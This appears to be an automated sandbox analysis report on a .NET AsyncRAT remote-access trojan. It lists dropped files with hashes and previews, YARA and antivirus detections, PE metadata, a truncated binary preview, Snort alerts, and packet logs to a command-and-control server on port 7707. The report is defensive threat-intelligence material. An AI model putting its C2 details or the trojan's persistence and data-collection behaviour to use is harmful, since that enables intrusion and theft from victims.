                                                                  MD5:69F1EB7DBB946D78F0D2AE0B7228257C
                                                                  SHA1:E1229CD69E21F921D135B7575A0F8E1EC5CAB0F5
                                                                  SHA-256:3240C86D3379358DB1AC976D64A510BA746F273BBCC6A16C4C88E4D0002E3F9D
                                                                  SHA-512:DAD1B6A1B744869CB2B77FEFC202E9AAA724BD3B9254C827C7F2C006A906DC3671038B1C189B965F7017E76003AECE7ADAE4DEFB7E3D6E6860258A120666E5D4
                                                                  Malicious:false
                                                                  Preview:PJN2M-GWXQB-JGFCC-DT97H-B64C4

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\System\ScanningNetworks.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):84
                                                                  Entropy (8bit):4.6630509827051725
                                                                  Encrypted:false
                                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                  Malicious:false
                                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\System\Windows.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):13461
                                                                  Entropy (8bit):5.661557387078866
                                                                  Encrypted:false
                                                                  SSDEEP:96:okQuRQuIQuTQu7QuOQuwQuNQuHkQuQQR5HRQu5QugQuSQuyQu1KQuoQ4yzqToQuA:9mm6Nr
                                                                  MD5:2E19D87AA7C2834A564D143E94FFB72B
                                                                  SHA1:05B32AB94A1BE83DD5130EEC1D3425F876F99F62
                                                                  SHA-256:E26FE6099161CBCB45FFC873C1F972616A5176AE45BCBC5FAF8EC2E50668781E
                                                                  SHA-512:9340F24E7AB865AD93DA0E4686504B3E1DB5DB488AD1E347519901725D2A7B6A5E93E9025BA17B4FDD2ED03E026AF237DEB81CDE0307E33856E13B4234FB6684
                                                                  Malicious:false
                                                                  Preview:NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6864..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6432..EXE: C:\Prog

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\System\WorldWind.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                  Category:dropped
                                                                  Size (bytes):85767
                                                                  Entropy (8bit):7.853997815147752
                                                                  Encrypted:false
                                                                  SSDEEP:1536:CL3NNYJeIpZc0t5VhYy8+XDtRCec2bDv5v777UrYXnzwmDZqxP4MUnd:mNNYJvlt5VhYyRGec2pD77Usjw5Zgd
                                                                  MD5:656D152B7BE147FE1B650753016338DE
                                                                  SHA1:D00070618EB319F76C9B4D88A49BEE27485155E1
                                                                  SHA-256:1A4ED9C4EE79FE2D702B4D94BC38C8A4579F14A6DB396BA9FD60280D3166F8DA
                                                                  SHA-512:2745F300B6BEAC678EB2A56E4036DC5DD92963294C775A2827719588911B516CFD1E1FA6574F0B0BEFC1F4FD8C33179AE82C66D080CC75B2DB0BFEAFA7DB062C
                                                                  Malicious:false
                                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\msgid.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3
                                                                  Entropy (8bit):1.584962500721156
                                                                  Encrypted:false
                                                                  SSDEEP:3:jX:r
                                                                  MD5:C22ABFA379F38B5B0411BC11FA9BF92F
                                                                  SHA1:5A14EC71168CE0B15C0E9CECE3865E308E28E32B
                                                                  SHA-256:3658D7FA3C43456F3C9C87DB0490E872039516E6375336254560167CC3DB2EA2
                                                                  SHA-512:8CF2BC30BF48B1BC3BEFDB298A389C99BC806E801A12909413583EFBD4348D6227421F43E9A2EA8508EA05B4E0FC23DAE4E2E26A54887F7080876D4CFA42DF95
                                                                  Malicious:false
                                                                  Preview:972

                                                                  C:\Users\user\AppData\Local\c06292cc69b15c369d5946f697f480f2\msgid.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:modified
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Preview:0

                                                                  C:\Users\user\AppData\Roaming\svchost.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):48640
                                                                  Entropy (8bit):5.560726940578406
                                                                  Encrypted:false
                                                                  SSDEEP:768:IuyxNTAoZjRWUJd9bmo2qL2TJ4+3Qk8sna9lzPIaj9vtqb5HTKsvWy0oKCnX5Eev:IuyxNTAGL2Mk839lcaj9vIbJWsZoWFnt
                                                                  MD5:6D13D147A209E3BE044035F0C03B7BDE
                                                                  SHA1:1EB5FB487EA7742FF1766CA5BF1B7191CFCF6283
                                                                  SHA-256:9C457B1CD061AE951FBED7841149B247E085BEFA6E2C5170058CE35CDEBCE548
                                                                  SHA-512:A159D09265FA833AFDDCE5FE7FAB6D4BE0FC37FD4C2E0D1A15851427764AD3C068249BA28D000A076209D017CB65E4320752AC7A3A0314239D836F1E15AE39A9
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                  Joe Sandbox View:
                                                                  • Filename: w5APKwp5DD.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................~.... ........@.. ....................... ............@.................................(...S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H........Y..4v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vrv%.p~....(o....#...*.s...

                                                                  \Device\Null

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.41440934524794
                                                                  Encrypted:false
                                                                  SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                  MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                  SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                  SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                  SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                  Malicious:false
                                                                  Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.560726940578406
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:zrrHgsDzgS.exe
                                                                  File size:48'640 bytes
                                                                  MD5:6d13d147a209e3be044035f0c03b7bde
                                                                  SHA1:1eb5fb487ea7742ff1766ca5bf1b7191cfcf6283
                                                                  SHA256:9c457b1cd061ae951fbed7841149b247e085befa6e2c5170058ce35cdebce548
                                                                  SHA512:a159d09265fa833afddce5fe7fab6d4be0fc37fd4c2e0d1a15851427764ad3c068249ba28d000a076209d017cb65e4320752ac7a3a0314239d836f1e15ae39a9
                                                                  SSDEEP:768:IuyxNTAoZjRWUJd9bmo2qL2TJ4+3Qk8sna9lzPIaj9vtqb5HTKsvWy0oKCnX5Eev:IuyxNTAGL2Mk839lcaj9vIbJWsZoWFnt
                                                                  TLSH:BC233D003BE98227F27E4F78ADF22245857AF6673602D64D2CC4519B5B13FC296426FE
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-e............................~.... ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:90cececece8e8eb0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40d07e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x652DADE5 [Mon Oct 16 21:40:53 2023 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd0280x53.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x7ff.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb0840xb200445296c6266560c64480205d2ff55c02False0.5416959269662921data5.618380092634787IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xe0000x7ff0x8000f68ce4dd77ed0bb9c1e6b31f6995d94False0.41748046875data4.88506844918463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x100000xc0x2004cabfef58a4e8716ddd98e1c6e729d0dFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0xe0a00x2ccdata0.43575418994413406
                                                                  RT_MANIFEST0xe36c0x493exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.43381725021349277

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  06/28/24-11:19:22.223998TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)77074973994.232.249.111192.168.2.4
                                                                  06/28/24-11:19:22.223998TCP2035595ET TROJAN Generic AsyncRAT Style SSL Cert77074973994.232.249.111192.168.2.4

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 28, 2024 11:19:21.556683064 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:21.562083006 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:21.562206984 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:21.572130919 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:21.578494072 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:22.223998070 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:22.224515915 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:22.224576950 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:22.232781887 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:22.237565041 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:22.420758009 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:22.462508917 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:22.565074921 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:22.573772907 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:22.573828936 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:22.579189062 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.875900984 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876090050 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876099110 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876106024 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876115084 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876121044 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876168966 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.876182079 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876205921 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.876635075 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876696110 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876705885 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876715899 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.876739025 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.876833916 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.877082109 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.877485037 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.881517887 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.881531000 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.881580114 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.883011103 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.884516001 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.967252016 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.967389107 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.967398882 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.967407942 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.967444897 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.967468023 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.975800991 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.975934029 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.975944996 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.975951910 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.975963116 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.975996971 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.984380007 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.984390974 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.984400034 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.984409094 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.984431028 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.984445095 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.989279985 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.989294052 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.989303112 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.989341021 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.989361048 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.989367008 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.989372969 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.989408016 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.999141932 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.999243021 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.999253988 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.999264002 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:23.999284983 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:23.999314070 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.004043102 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.004055977 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.004102945 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.004115105 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.004116058 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.004125118 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.004177094 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.008795977 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.008984089 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.061594009 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.061615944 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.061628103 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.061672926 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.061733961 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.061901093 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.066653013 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.066663980 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.066713095 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.066731930 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.066742897 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.066792011 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.071495056 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.071506023 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.071551085 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.071683884 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.071692944 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.071702957 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.071758032 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.077316046 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.077328920 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.077367067 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.077368021 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.077378988 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.077404976 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.082192898 CEST77074973994.232.249.111192.168.2.4
